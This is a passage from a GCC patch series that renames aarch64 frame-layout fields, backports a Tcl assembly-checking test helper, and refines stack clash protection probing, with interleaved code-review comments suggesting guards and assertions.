271 /* Offset from the base of the frame (incomming SP) to the
272 top of the locals area. This value is always a multiple of
273 STACK_BOUNDARY. */
274--
2752.34.1
276
277
278From 4604c4cd0a6c4c26d6594ec9a0383b4d9197d9df Mon Sep 17 00:00:00 2001
279From: Richard Sandiford <richard.sandiford@arm.com>
280Date: Tue, 27 Jun 2023 11:25:40 +0100
281Subject: [PATCH 03/10] aarch64: Rename locals_offset to bytes_above_locals
282MIME-Version: 1.0
283Content-Type: text/plain; charset=UTF-8
284Content-Transfer-Encoding: 8bit
285
286locals_offset was described as:
287
288 /* Offset from the base of the frame (incomming SP) to the
289 top of the locals area. This value is always a multiple of
290 STACK_BOUNDARY. */
291
292This is implicitly an “upside down” view of the frame: the incoming
293SP is at offset 0, and anything N bytes below the incoming SP is at
294offset N (rather than -N).
295
296However, reg_offset instead uses a “right way up” view; that is,
297it views offsets in address terms. Something above X is at a
298positive offset from X and something below X is at a negative
299offset from X.
300
301Also, even on FRAME_GROWS_DOWNWARD targets like AArch64,
302target-independent code views offsets in address terms too:
303locals are allocated at negative offsets to virtual_stack_vars.
304
305It seems confusing to have *_offset fields of the same structure
306using different polarities like this. This patch tries to avoid
307that by renaming locals_offset to bytes_above_locals.
308
309gcc/
310 * config/aarch64/aarch64.h (aarch64_frame::locals_offset): Rename to...
311 (aarch64_frame::bytes_above_locals): ...this.
312 * config/aarch64/aarch64.c (aarch64_layout_frame)
313 (aarch64_initial_elimination_offset): Update accordingly.
314---
315 gcc/config/aarch64/aarch64.c | 9 +++++----
316 gcc/config/aarch64/aarch64.h | 6 +++---
317 2 files changed, 8 insertions(+), 7 deletions(-)
318
319diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
320index 25cf10cc4b9..dcaf491af42 100644
321--- a/gcc/config/aarch64/aarch64.c
322+++ b/gcc/config/aarch64/aarch64.c
323@@ -4759,7 +4759,8 @@ aarch64_layout_frame (void)
324 = (cfun->machine->frame.hard_fp_offset
325 + cfun->machine->frame.bytes_below_hard_fp);
326
327- cfun->machine->frame.locals_offset = cfun->machine->frame.saved_varargs_size;
328+ cfun->machine->frame.bytes_above_locals
329+ = cfun->machine->frame.saved_varargs_size;
330
331 cfun->machine->frame.initial_adjust = 0;
332 cfun->machine->frame.final_adjust = 0;
333@@ -8566,14 +8567,14 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
334
335 if (from == FRAME_POINTER_REGNUM)
336 return cfun->machine->frame.hard_fp_offset
337- - cfun->machine->frame.locals_offset;
338+ - cfun->machine->frame.bytes_above_locals;
339 }
340
341 if (to == STACK_POINTER_REGNUM)
342 {
343 if (from == FRAME_POINTER_REGNUM)
344- return cfun->machine->frame.frame_size
345- - cfun->machine->frame.locals_offset;
346+ return cfun->machine->frame.frame_size
347+ - cfun->machine->frame.bytes_above_locals;
348 }
349
350 return cfun->machine->frame.frame_size;
351diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
352index 95831637ba7..a079a88b4f4 100644
353--- a/gcc/config/aarch64/aarch64.h
354+++ b/gcc/config/aarch64/aarch64.h
355@@ -719,10 +719,10 @@ struct GTY (()) aarch64_frame
356 always a multiple of STACK_BOUNDARY. */
357 poly_int64 bytes_below_hard_fp;
358
359- /* Offset from the base of the frame (incomming SP) to the
360- top of the locals area. This value is always a multiple of
361+ /* The number of bytes between the top of the locals area and the top
362+ of the frame (the incomming SP). This value is always a multiple of
363 STACK_BOUNDARY. */
364- poly_int64 locals_offset;
365+ poly_int64 bytes_above_locals;
366
367 /* Offset from the base of the frame (incomming SP) to the
368 hard_frame_pointer. This value is always a multiple of
369--
3702.34.1
371
372
373From 16016465ff28a75f5e0540cbaeb4eb102fdc3230 Mon Sep 17 00:00:00 2001
374From: Richard Sandiford <richard.sandiford@arm.com>
375Date: Tue, 27 Jun 2023 11:28:11 +0100
376Subject: [PATCH 04/10] aarch64: Rename hard_fp_offset to bytes_above_hard_fp
377MIME-Version: 1.0
378Content-Type: text/plain; charset=UTF-8
379Content-Transfer-Encoding: 8bit
380
381Similarly to the previous locals_offset patch, hard_fp_offset
382was described as:
383
384 /* Offset from the base of the frame (incomming SP) to the
385 hard_frame_pointer. This value is always a multiple of
386 STACK_BOUNDARY. */
387 poly_int64 hard_fp_offset;
388
389which again took an “upside-down” view: higher offsets meant lower
390addresses. This patch renames the field to bytes_above_hard_fp instead.
391
392gcc/
393 * config/aarch64/aarch64.h (aarch64_frame::hard_fp_offset): Rename
394 to...
395 (aarch64_frame::bytes_above_hard_fp): ...this.
396 * config/aarch64/aarch64.c (aarch64_layout_frame)
397 (aarch64_expand_prologue): Update accordingly.
398 (aarch64_initial_elimination_offset): Likewise.
399---
400 gcc/config/aarch64/aarch64.c | 21 +++++++++++----------
401 gcc/config/aarch64/aarch64.h | 6 +++---
402 2 files changed, 14 insertions(+), 13 deletions(-)
403
404diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
405index dcaf491af42..2681e0c2bb9 100644
406--- a/gcc/config/aarch64/aarch64.c
407+++ b/gcc/config/aarch64/aarch64.c
408@@ -4747,7 +4747,7 @@ aarch64_layout_frame (void)
409 HOST_WIDE_INT varargs_and_saved_regs_size
410 = offset + cfun->machine->frame.saved_varargs_size;
411
412- cfun->machine->frame.hard_fp_offset
413+ cfun->machine->frame.bytes_above_hard_fp
414 = aligned_upper_bound (varargs_and_saved_regs_size
415 + get_frame_size (),
416 STACK_BOUNDARY / BITS_PER_UNIT);
417@@ -4756,7 +4756,7 @@ aarch64_layout_frame (void)
418 gcc_assert (multiple_p (cfun->machine->frame.bytes_below_hard_fp,
419 STACK_BOUNDARY / BITS_PER_UNIT));
420 cfun->machine->frame.frame_size
421- = (cfun->machine->frame.hard_fp_offset
422+ = (cfun->machine->frame.bytes_above_hard_fp
423 + cfun->machine->frame.bytes_below_hard_fp);
424
425 cfun->machine->frame.bytes_above_locals
426@@ -4788,7 +4788,7 @@ aarch64_layout_frame (void)
427 else if (known_lt (cfun->machine->frame.bytes_below_hard_fp
428 + cfun->machine->frame.saved_regs_size, 512)
429 && !(cfun->calls_alloca
430- && known_lt (cfun->machine->frame.hard_fp_offset,
431+ && known_lt (cfun->machine->frame.bytes_above_hard_fp,
432 max_push_offset)))
433 {
434 /* Frame with small area below the saved registers:
435@@ -4797,14 +4797,14 @@ aarch64_layout_frame (void)
436 stp reg3, reg4, [sp, bytes_below_hard_fp + 16] */
437 cfun->machine->frame.initial_adjust = cfun->machine->frame.frame_size;
438 cfun->machine->frame.callee_offset
439- = cfun->machine->frame.frame_size - cfun->machine->frame.hard_fp_offset;
440+ = cfun->machine->frame.frame_size - cfun->machine->frame.bytes_above_hard_fp;
441 }
442- else if (cfun->machine->frame.hard_fp_offset.is_constant (&const_fp_offset)
443+ else if (cfun->machine->frame.bytes_above_hard_fp.is_constant (&const_fp_offset)
444 && const_fp_offset < max_push_offset)
445 {
446 /* Frame with large area below the saved registers, but with a
447 small area above:
448- stp reg1, reg2, [sp, -hard_fp_offset]!
449+ stp reg1, reg2, [sp, -bytes_above_hard_fp]!
450 stp reg3, reg4, [sp, 16]
451 sub sp, sp, bytes_below_hard_fp */
452 cfun->machine->frame.callee_adjust = const_fp_offset;
453@@ -4814,12 +4814,13 @@ aarch64_layout_frame (void)
454 else
455 {
456 /* General case:
457- sub sp, sp, hard_fp_offset
458+ sub sp, sp, bytes_above_hard_fp
459 stp x29, x30, [sp, 0]
460 add x29, sp, 0
461 stp reg3, reg4, [sp, 16]
462 sub sp, sp, bytes_below_hard_fp */
463- cfun->machine->frame.initial_adjust = cfun->machine->frame.hard_fp_offset;
464+ cfun->machine->frame.initial_adjust
465+ = cfun->machine->frame.bytes_above_hard_fp;
466 cfun->machine->frame.final_adjust
467 = cfun->machine->frame.frame_size - cfun->machine->frame.initial_adjust;
468 }
469@@ -8563,10 +8564,10 @@ aarch64_initial_elimination_offset (unsigned from, unsigned to)
470 if (to == HARD_FRAME_POINTER_REGNUM)
471 {
472 if (from == ARG_POINTER_REGNUM)
473- return cfun->machine->frame.hard_fp_offset;
474+ return cfun->machine->frame.bytes_above_hard_fp;
475
476 if (from == FRAME_POINTER_REGNUM)
477- return cfun->machine->frame.hard_fp_offset
478+ return cfun->machine->frame.bytes_above_hard_fp
479 - cfun->machine->frame.bytes_above_locals;
480 }
481
482diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
483index a079a88b4f4..eab6da84a02 100644
484--- a/gcc/config/aarch64/aarch64.h
485+++ b/gcc/config/aarch64/aarch64.h
486@@ -724,10 +724,10 @@ struct GTY (()) aarch64_frame
487 STACK_BOUNDARY. */
488 poly_int64 bytes_above_locals;
489
490- /* Offset from the base of the frame (incomming SP) to the
491- hard_frame_pointer. This value is always a multiple of
492+ /* The number of bytes between the hard_frame_pointer and the top of
493+ the frame (the incomming SP). This value is always a multiple of
494 STACK_BOUNDARY. */
495- poly_int64 hard_fp_offset;
496+ poly_int64 bytes_above_hard_fp;
497
498 /* The size of the frame. This value is the offset from base of the
499 frame (incomming SP) to the stack_pointer. This value is always
500--
5012.34.1
502
503
504From eb2271eb6bb68ec3c9aa9ae4746ea1ee5f18874a Mon Sep 17 00:00:00 2001
505From: Richard Sandiford <richard.sandiford@arm.com>
506Date: Thu, 22 Jun 2023 22:26:30 +0100
507Subject: [PATCH 05/10] aarch64: Tweak frame_size comment
508MIME-Version: 1.0
509Content-Type: text/plain; charset=UTF-8
510Content-Transfer-Encoding: 8bit
511
512This patch fixes another case in which a value was described with
513an “upside-down” view.
514
515gcc/
516 * config/aarch64/aarch64.h (aarch64_frame::frame_size): Tweak comment.
517---
518 gcc/config/aarch64/aarch64.h | 4 ++--
519 1 file changed, 2 insertions(+), 2 deletions(-)
520
521diff --git a/gcc/config/aarch64/aarch64.h b/gcc/config/aarch64/aarch64.h
522index eab6da84a02..7c4b65ec55b 100644
523--- a/gcc/config/aarch64/aarch64.h
524+++ b/gcc/config/aarch64/aarch64.h
525@@ -729,8 +729,8 @@ struct GTY (()) aarch64_frame
526 STACK_BOUNDARY. */
527 poly_int64 bytes_above_hard_fp;
528
529- /* The size of the frame. This value is the offset from base of the
530- frame (incomming SP) to the stack_pointer. This value is always
531+ /* The size of the frame, i.e. the number of bytes between the bottom
532+ of the outgoing arguments and the incoming SP. This value is always
533 a multiple of STACK_BOUNDARY. */
534 poly_int64 frame_size;
535
536--
5372.34.1
538
539
540From cfed3b87e9351edff1568ade4ef666edc9887639 Mon Sep 17 00:00:00 2001
541From: Richard Sandiford <richard.sandiford@arm.com>
542Date: Tue, 15 Aug 2023 19:05:30 +0100
543Subject: [PATCH 06/10] Backport check-function-bodies support
544
545---
546 gcc/testsuite/lib/scanasm.exp | 191 ++++++++++++++++++++++++++++++++++
547 1 file changed, 191 insertions(+)
548
549diff --git a/gcc/testsuite/lib/scanasm.exp b/gcc/testsuite/lib/scanasm.exp
550index 35ccbc86fc0..c9af27bf47a 100644
551--- a/gcc/testsuite/lib/scanasm.exp
552+++ b/gcc/testsuite/lib/scanasm.exp
553@@ -546,3 +546,194 @@ proc scan-lto-assembler { args } {
554 verbose "output_file: $output_file"
555 dg-scan "scan-lto-assembler" 1 $testcase $output_file $args
556 }
557+
558+# Read assembly file FILENAME and store a mapping from function names
559+# to function bodies in array RESULT. FILENAME has already been uploaded
560+# locally where necessary and is known to exist.
561+
562+proc parse_function_bodies { filename result } {
563+ upvar $result up_result
564+
565+ # Regexp for the start of a function definition (name in \1).
566+ set label {^([a-zA-Z_]\S+):$}
567+
568+ # Regexp for the end of a function definition.
569+ set terminator {^\s*\.size}
570+
571+ # Regexp for lines that aren't interesting.
572+ set fluff {^\s*(?:\.|//|@|$)}
573+
574+ set fd [open $filename r]
575+ set in_function 0
576+ while { [gets $fd line] >= 0 } {
577+ if { [regexp $label $line dummy function_name] } {
578+ set in_function 1
579+ set function_body ""
580+ } elseif { $in_function } {
581+ if { [regexp $terminator $line] } {
582+ set up_result($function_name) $function_body
583+ set in_function 0
584+ } elseif { ![regexp $fluff $line] } {
585+ append function_body $line "\n"
586+ }
587+ }
588+ }
589+ close $fd
590+}
591+
592+# FUNCTIONS is an array that maps function names to function bodies.
593+# Return true if it contains a definition of function NAME and if
594+# that definition matches BODY_REGEXP.
595+
596+proc check_function_body { functions name body_regexp } {
597+ upvar $functions up_functions
598+
599+ if { ![info exists up_functions($name)] } {
600+ return 0
601+ }
602+ set fn_res [regexp "^$body_regexp\$" $up_functions($name)]
603+ if { !$fn_res } {
604+ verbose -log "body: $body_regexp"
605+ verbose -log "against: $up_functions($name)"
606+ }
607+ return $fn_res
608+}
609+
610+# Check the implementations of functions against expected output. Used as:
611+#
612+# { dg-do { check-function-bodies PREFIX TERMINATOR[ OPTION[ SELECTOR]] } }
613+#
614+# See sourcebuild.texi for details.
615+
616+proc check-function-bodies { args } {
617+ if { [llength $args] < 2 } {
618+ error "too few arguments to check-function-bodies"
619+ }
620+ if { [llength $args] > 4 } {
621+ error "too many arguments to check-function-bodies"
622+ }
623+
624+ if { [llength $args] >= 3 } {
625+ set required_flags [lindex $args 2]
626+
627+ upvar 2 dg-extra-tool-flags extra_tool_flags
628+ set flags $extra_tool_flags
629+
630+ global torture_current_flags
631+ if { [info exists torture_current_flags] } {
632+ append flags " " $torture_current_flags
633+ }
634+ foreach required_flag $required_flags {
635+ switch -- $required_flag {
636+ target -
637+ xfail {
638+ error "misplaced $required_flag in check-function-bodies"
639+ }
640+ }
641+ }
642+ foreach required_flag $required_flags {
643+ if { ![regexp " $required_flag " $flags] } {
644+ return
645+ }
646+ }
647+ }
648+
649+ set xfail_all 0
650+ if { [llength $args] >= 4 } {
651+ switch [dg-process-target [lindex $args 3]] {
652+ "S" { }
653+ "N" { return }
654+ "F" { set xfail_all 1 }
655+ "P" { }
656+ }
657+ }
658+
659+ set testcase [testname-for-summary]
660+ # The name might include a list of options; extract the file name.
661+ set filename [lindex $testcase 0]
662+
663+ global srcdir
664+ set input_filename "$srcdir/$filename"
665+ set output_filename "[file rootname [file tail $filename]].s"
666+
667+ set prefix [lindex $args 0]
668+ set prefix_len [string length $prefix]
669+ set terminator [lindex $args 1]
670+ if { [string equal $terminator ""] } {
671+ set terminator "*/"
672+ }
673+ set terminator_len [string length $terminator]
674+
675+ set have_bodies 0
676+ if { [is_remote host] } {
677+ remote_upload host "$filename"
678+ }
679+ if { [file exists $output_filename] } {
680+ parse_function_bodies $output_filename functions
681+ set have_bodies 1
682+ } else {
683+ verbose -log "$testcase: output file does not exist"
684+ }
685+
686+ set count 0
687+ set function_regexp ""
688+ set label {^(\S+):$}
689+
690+ set lineno 1
691+ set fd [open $input_filename r]
692+ set in_function 0
693+ while { [gets $fd line] >= 0 } {
694+ if { [string equal -length $prefix_len $line $prefix] } {
695+ set line [string trim [string range $line $prefix_len end]]
696+ if { !$in_function } {
697+ if { [regexp "^(.*?\\S)\\s+{(.*)}\$" $line dummy \
698+ line selector] } {
699+ set selector [dg-process-target $selector]
700+ } else {
701+ set selector "P"
702+ }
703+ if { ![regexp $label $line dummy function_name] } {
704+ close $fd
705+ error "check-function-bodies: line $lineno does not have a function label"
706+ }
707+ set in_function 1
708+ set function_regexp ""
709+ } elseif { [string equal $line "("] } {
710+ append function_regexp "(?:"
711+ } elseif { [string equal $line "|"] } {
712+ append function_regexp "|"
713+ } elseif { [string equal $line ")"] } {
714+ append function_regexp ")"
715+ } elseif { [string equal $line "..."] } {
716+ append function_regexp ".*"
717+ } else {
718+ append function_regexp "\t" $line "\n"
719+ }
720+ } elseif { [string equal -length $terminator_len $line $terminator] } {
721+ if { ![string equal $selector "N"] } {
722+ if { $xfail_all || [string equal $selector "F"] } {
723+ setup_xfail "*-*-*"
724+ }
725+ set testname "$testcase check-function-bodies $function_name"
726+ if { !$have_bodies } {
727+ unresolved $testname
728+ } elseif { [check_function_body functions $function_name \
729+ $function_regexp] } {
730+ pass $testname
731+ } else {
732+ fail $testname
733+ }
734+ }
735+ set in_function 0
736+ incr count
737+ }
738+ incr lineno
739+ }
740+ close $fd
741+ if { $in_function } {
742+ error "check-function-bodies: missing \"$terminator\""
743+ }
744+ if { $count == 0 } {
745+ error "check-function-bodies: no matches found"
746+ }
747+}
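Review bot: The terminator branch in check-function-bodies (`} elseif { [string equal -length $terminator_len $line $terminator] } {`) is not conditioned on `$in_function`, so any source line that begins with the terminator (by default `*/`) is treated as the end of an expected body even when no prefixed label line came before it. At that point `$selector` and `$function_name` are either unset, which raises a Tcl error, or left over from the previous function, which re-runs and re-counts a stale check. Guarding the branch, `} elseif { $in_function && [string equal -length $terminator_len $line $terminator] } {`, keeps ordinary multi-line comments in a test source from being read as expected bodies.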
748--
7492.34.1
750
751
752From 4dd8925d95d3d6d89779b494b5f4cfadcf9fa96e Mon Sep 17 00:00:00 2001
753From: Richard Sandiford <richard.sandiford@arm.com>
754Date: Tue, 27 Jun 2023 15:11:44 +0100
755Subject: [PATCH 07/10] aarch64: Tweak stack clash boundary condition
756
757The AArch64 ABI says that, when stack clash protection is used,
758there can be a maximum of 1KiB of unprobed space at sp on entry
759to a function. Therefore, we need to probe when allocating
760>= guard_size - 1KiB of data (>= rather than >). This is what
761GCC does.
762
763If an allocation is exactly guard_size bytes, it is enough to allocate
764those bytes and probe once at offset 1024. It isn't possible to use a
765single probe at any other offset: higher would complicate later code,
766by leaving more unprobed space than usual, while lower would risk
767leaving an entire page unprobed. For simplicity, the code probes all
768allocations at offset 1024.
769
770Some register saves also act as probes. If we need to allocate
771more space below the last such register save probe, we need to
772probe the allocation if it is > 1KiB. Again, this allocation is
773then sometimes (but not always) probed at offset 1024. This sort of
774allocation is currently only used for outgoing arguments, which are
775rarely this big.
776
777However, the code also probed if this final outgoing-arguments
778allocation was == 1KiB, rather than just > 1KiB. This isn't
779necessary, since the register save then probes at offset 1024
780as required. Continuing to probe allocations of exactly 1KiB
781would complicate later patches.
782
783gcc/
784 * config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
785 Don't probe final allocations that are exactly 1KiB in size (after
786 unprobed space above the final allocation has been deducted).
787
788gcc/testsuite/
789 * gcc.target/aarch64/stack-check-prologue-17.c: New test.
790---
791 gcc/config/aarch64/aarch64.c | 6 +-
792 .../aarch64/stack-check-prologue-17.c | 55 +++++++++++++++++++
793 2 files changed, 60 insertions(+), 1 deletion(-)
794 create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
795
796diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
797index 2681e0c2bb9..4c9e11cd7cf 100644
798--- a/gcc/config/aarch64/aarch64.c
799+++ b/gcc/config/aarch64/aarch64.c
800@@ -5506,6 +5506,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
801 HOST_WIDE_INT guard_size
802 = 1 << PARAM_VALUE (PARAM_STACK_CLASH_PROTECTION_GUARD_SIZE);
803 HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
804+ HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
805+ gcc_assert (multiple_p (poly_size, byte_sp_alignment));
806 /* When doing the final adjustment for the outgoing argument size we can't
807 assume that LR was saved at position 0. So subtract it's offset from the
808 ABI safe buffer so that we don't accidentally allow an adjustment that
809@@ -5513,7 +5515,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
810 probing. */
811 HOST_WIDE_INT min_probe_threshold
812 = final_adjustment_p
813- ? guard_used_by_caller - cfun->machine->frame.reg_offset[LR_REGNUM]
814+ ? (guard_used_by_caller
815+ + byte_sp_alignment
816+ - cfun->machine->frame.reg_offset[LR_REGNUM])
817 : guard_size - guard_used_by_caller;
818
819 poly_int64 frame_size = cfun->machine->frame.frame_size;
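Review bot: Nothing in the new code says why `byte_sp_alignment` is added to the final-adjustment threshold; the context comment above `min_probe_threshold` still only explains why the LR offset is subtracted. The function's own comment says residuals of at least MIN_PROBE_THRESHOLD are probed, so the addition is presumably what moves the boundary from `>= 1KiB` to `> 1KiB`, and it is only sound because of the `gcc_assert (multiple_p (poly_size, byte_sp_alignment))` added in the previous hunk. I would extend the comment with something like `/* Sizes are multiples of BYTE_SP_ALIGNMENT, so adding it turns the ">=" test against the threshold into a strict ">" on the ABI buffer. */`. The comparison that consumes the threshold is outside these hunks, so the wording should be checked against it.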
820diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
821new file mode 100644
822index 00000000000..0d8a25d73a2
823--- /dev/null
824+++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
825@@ -0,0 +1,55 @@
826+/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
827+/* { dg-final { check-function-bodies "**" "" } } */
828+
829+void f(int, ...);
830+void g();
831+
832+/*
833+** test1:
834+** ...
835+** str x30, \[sp\]
836+** sub sp, sp, #1024
837+** cbnz w0, .*
838+** bl g
839+** ...
840+*/
841+int test1(int z) {
842+ __uint128_t x = 0;
843+ int y[0x400];
844+ if (z)
845+ {
846+ f(0, 0, 0, 0, 0, 0, 0, &y,
847+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
848+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
849+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
850+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
851+ }
852+ g();
853+ return 1;
854+}
855+
856+/*
857+** test2:
858+** ...
859+** str x30, \[sp\]
860+** sub sp, sp, #1040
861+** str xzr, \[sp\]
862+** cbnz w0, .*
863+** bl g
864+** ...
865+*/
866+int test2(int z) {
867+ __uint128_t x = 0;
868+ int y[0x400];
869+ if (z)
870+ {
871+ f(0, 0, 0, 0, 0, 0, 0, &y,
872+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
873+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
874+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
875+ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
876+ x);
877+ }
878+ g();
879+ return 1;
880+}
881--
8822.34.1
883
884
885From 12517baf6c88447e3bda3a459ac4c29d61f84e6c Mon Sep 17 00:00:00 2001
886From: Richard Sandiford <richard.sandiford@arm.com>
887Date: Tue, 27 Jun 2023 15:12:55 +0100
888Subject: [PATCH 08/10] aarch64: Put LR save probe in first 16 bytes
889
890-fstack-clash-protection uses the save of LR as a probe for the next
891allocation. The next allocation could be:
892
893* another part of the static frame, e.g. when allocating SVE save slots
894 or outgoing arguments
895
896* an alloca in the same function
897
898* an allocation made by a callee function
899
900However, when -fomit-frame-pointer is used, the LR save slot is placed
901above the other GPR save slots. It could therefore be up to 80 bytes
902above the base of the GPR save area (which is also the hard fp address).
903
904aarch64_allocate_and_probe_stack_space took this into account when
905deciding how much subsequent space could be allocated without needing
906a probe. However, it interacted badly with:
907
908 /* If doing a small final adjustment, we always probe at offset 0.
909 This is done to avoid issues when LR is not at position 0 or when
910 the final adjustment is smaller than the probing offset. */
911 else if (final_adjustment_p && rounded_size == 0)
912 residual_probe_offset = 0;
913
914which forces any allocation that is smaller than the guard page size
915to be probed at offset 0 rather than the usual offset 1024. It was
916therefore possible to construct cases in which we had:
917
918* a probe using LR at SP + 80 bytes (or some other value >= 16)
919* an allocation of the guard page size - 16 bytes
920* a probe at SP + 0
921
922which allocates guard page size + 64 consecutive unprobed bytes.
923
924This patch requires the LR probe to be in the first 16 bytes of the
925save area when stack clash protection is active. Doing it
926unconditionally would cause code-quality regressions.
927
928gcc/
929 * config/aarch64/aarch64.c (aarch64_layout_frame): Ensure that
930 the LR save slot is in the first 16 bytes of the register save area.
931 (aarch64_allocate_and_probe_stack_space): Remove workaround for
932 when LR was not in the first 16 bytes.
933
934gcc/testsuite/
935 * gcc.target/aarch64/stack-check-prologue-18.c: New test.
936---
937 gcc/config/aarch64/aarch64.c | 50 +++++----
938 .../aarch64/stack-check-prologue-18.c | 100 ++++++++++++++++++
939 2 files changed, 127 insertions(+), 23 deletions(-)
940 create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
941
942diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
943index 4c9e11cd7cf..1e8467fdd03 100644
944--- a/gcc/config/aarch64/aarch64.c
945+++ b/gcc/config/aarch64/aarch64.c
946@@ -4686,15 +4686,31 @@ aarch64_layout_frame (void)
947
948 cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
949
950+#define ALLOCATE_GPR_SLOT(REGNO) \
951+ do \
952+ { \
953+ cfun->machine->frame.reg_offset[REGNO] = offset; \
954+ if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM) \
955+ cfun->machine->frame.wb_candidate1 = (REGNO); \
956+ else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM) \
957+ cfun->machine->frame.wb_candidate2 = (REGNO); \
958+ offset += UNITS_PER_WORD; \
959+ } \
960+ while (0)
961+
962 if (cfun->machine->frame.emit_frame_chain)
963 {
964 /* FP and LR are placed in the linkage record. */
965- cfun->machine->frame.reg_offset[R29_REGNUM] = 0;
966- cfun->machine->frame.wb_candidate1 = R29_REGNUM;
967- cfun->machine->frame.reg_offset[R30_REGNUM] = UNITS_PER_WORD;
968- cfun->machine->frame.wb_candidate2 = R30_REGNUM;
969- offset = 2 * UNITS_PER_WORD;
970+ ALLOCATE_GPR_SLOT (R29_REGNUM);
971+ ALLOCATE_GPR_SLOT (R30_REGNUM);
972 }
973+ else if (flag_stack_clash_protection
974+ && cfun->machine->frame.reg_offset[R30_REGNUM] == SLOT_REQUIRED)
975+ /* Put the LR save slot first, since it makes a good choice of probe
976+ for stack clash purposes. The idea is that the link register usually
977+ has to be saved before a call anyway, and so we lose little by
978+ stopping it from being individually shrink-wrapped. */
979+ ALLOCATE_GPR_SLOT (R30_REGNUM);
980
981 /* With stack-clash, LR must be saved in non-leaf functions. */
982 gcc_assert (crtl->is_leaf
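Review bot: `ALLOCATE_GPR_SLOT` takes every slot position from the running `offset`, whereas the removed lines wrote 0 and `UNITS_PER_WORD` for x29/x30 explicitly and then set `offset = 2 * UNITS_PER_WORD` outright. The LR-first placement that the stack-clash logic relies on therefore holds only if `offset` is still 0 when this code is reached; its initialisation is outside the hunk, so that needs confirming. Stating the precondition next to the macro, for example `gcc_assert (offset == 0);` before the `emit_frame_chain` test, would make a later reordering fail loudly instead of silently moving the LR save away from the base of the save area. aarch64_layout_frame starts before and continues after this hunk.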
983@@ -4704,14 +4720,9 @@ aarch64_layout_frame (void)
984 /* Now assign stack slots for them. */
985 for (regno = R0_REGNUM; regno <= R30_REGNUM; regno++)
986 if (cfun->machine->frame.reg_offset[regno] == SLOT_REQUIRED)
987- {
988- cfun->machine->frame.reg_offset[regno] = offset;
989- if (cfun->machine->frame.wb_candidate1 == INVALID_REGNUM)
990- cfun->machine->frame.wb_candidate1 = regno;
991- else if (cfun->machine->frame.wb_candidate2 == INVALID_REGNUM)
992- cfun->machine->frame.wb_candidate2 = regno;
993- offset += UNITS_PER_WORD;
994- }
995+ ALLOCATE_GPR_SLOT (regno);
996+
997+#undef ALLOCATE_GPR_SLOT
998
999 HOST_WIDE_INT max_int_offset = offset;
1000 offset = ROUND_UP (offset, STACK_BOUNDARY / BITS_PER_UNIT);
1001@@ -5508,16 +5519,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
1002 HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
1003 HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
1004 gcc_assert (multiple_p (poly_size, byte_sp_alignment));
1005- /* When doing the final adjustment for the outgoing argument size we can't
1006- assume that LR was saved at position 0. So subtract it's offset from the
1007- ABI safe buffer so that we don't accidentally allow an adjustment that
1008- would result in an allocation larger than the ABI buffer without
1009- probing. */
1010 HOST_WIDE_INT min_probe_threshold
1011 = final_adjustment_p
1012- ? (guard_used_by_caller
1013- + byte_sp_alignment
1014- - cfun->machine->frame.reg_offset[LR_REGNUM])
1015+ ? guard_used_by_caller + byte_sp_alignment
1016 : guard_size - guard_used_by_caller;
1017
1018 poly_int64 frame_size = cfun->machine->frame.frame_size;
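Review bot: With `- cfun->machine->frame.reg_offset[LR_REGNUM]` dropped from `min_probe_threshold`, this function assumes the LR save sits in the first 16 bytes of the save area, but nothing in the visible hunk checks that. The guarantee comes from aarch64_layout_frame, and only when stack clash protection is active, so a layout change there would leave more unprobed space than the threshold accounts for without any diagnostic. An assertion beside the threshold, such as `gcc_assert (!flag_stack_clash_protection || cfun->machine->frame.reg_offset[LR_REGNUM] < byte_sp_alignment);`, would tie the two together. Whether a plain `<` is right depends on the type of `reg_offset` and on how an unsaved LR is represented, both of which are defined outside the hunk. The function body continues outside this hunk.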
1019@@ -5697,8 +5701,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
1020 if (final_adjustment_p && rounded_size != 0)
1021 min_probe_threshold = 0;
1022 /* If doing a small final adjustment, we always probe at offset 0.
1023- This is done to avoid issues when LR is not at position 0 or when
1024- the final adjustment is smaller than the probing offset. */
1025+ This is done to avoid issues when the final adjustment is smaller
1026+ than the probing offset. */
1027 else if (final_adjustment_p && rounded_size == 0)
1028 residual_probe_offset = 0;
1029
1030diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
1031new file mode 100644
